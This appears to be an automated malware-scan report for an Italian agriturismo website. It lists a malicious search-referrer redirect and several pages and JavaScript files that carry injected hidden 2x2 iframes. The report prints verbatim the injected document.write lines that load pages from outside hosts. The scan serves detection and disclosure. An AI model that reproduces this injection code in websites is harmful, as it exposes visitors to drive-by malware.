Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.agriturismo-it.it/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.agriturismo-it.it Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 25 Oct 2015 06:03:26 GMT Location: http://reddeerhotyoga.ca/auyd.html?h=1597952 Server: nginx/1.8.0 Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.agriturismo-it.it/ | 200 OK Content-Length: 17478 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/wp-content/themes/agriturismo/script.js | 200 OK Content-Length: 11075 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht }); artEventHelper.bind(button, 'mouseup', function(e) { e = e || window.event; button = e.target || e.srcElement; wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> | ||
http://www.agriturismo-it.it/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57761 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht jQuery.noConflict(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> | ||
http://www.agriturismo-it.it/wp-includes/js/jquery/jquery.form.js?ver=2.02m | 200 OK Content-Length: 8915 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> | ||
http://www.agriturismo-it.it/wp-content/plugins/contact-form-7/scripts.js?ver=2.1.1 | 200 OK Content-Length: 4928 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht jQuery(form).find('input:hidden[name="_wpcf7_quiz_answer_' + i + '"]').attr('value', n[1]); }); } function wpcf7ClearResponseOutput() { jQuery('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked'); jQuery('span.wpcf7-not-valid-tip').remove(); jQuery('img.ajax-loader').css({ visibility: 'hidden' }); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> | ||
http://www.agriturismo-it.it/bed-and-breakfast.html | 200 OK Content-Length: 7597 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/hotel.html | 200 OK Content-Length: 7596 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/ristoranti.html | 200 OK Content-Length: 7816 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/inserimento-online.html | 200 OK Content-Length: 21588 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/wp-content/uploads/2010/02/struttura-turistica-online1.jpg | 200 OK Content-Length: 24262 Content-Type: image/jpeg | clean |
http://www.agriturismo-it.it/test404page.js | 404 Not Found Content-Length: 9806 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_abruzzo.html | 200 OK Content-Length: 13489 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_basilicata.html | 200 OK Content-Length: 12519 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_calabria.html | 200 OK Content-Length: 12668 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_campania.html | 200 OK Content-Length: 14614 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agriturismo-it.it
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://agriturismo-it.it/
Result: agriturismo-it.it is not infected or malware details are not published yet.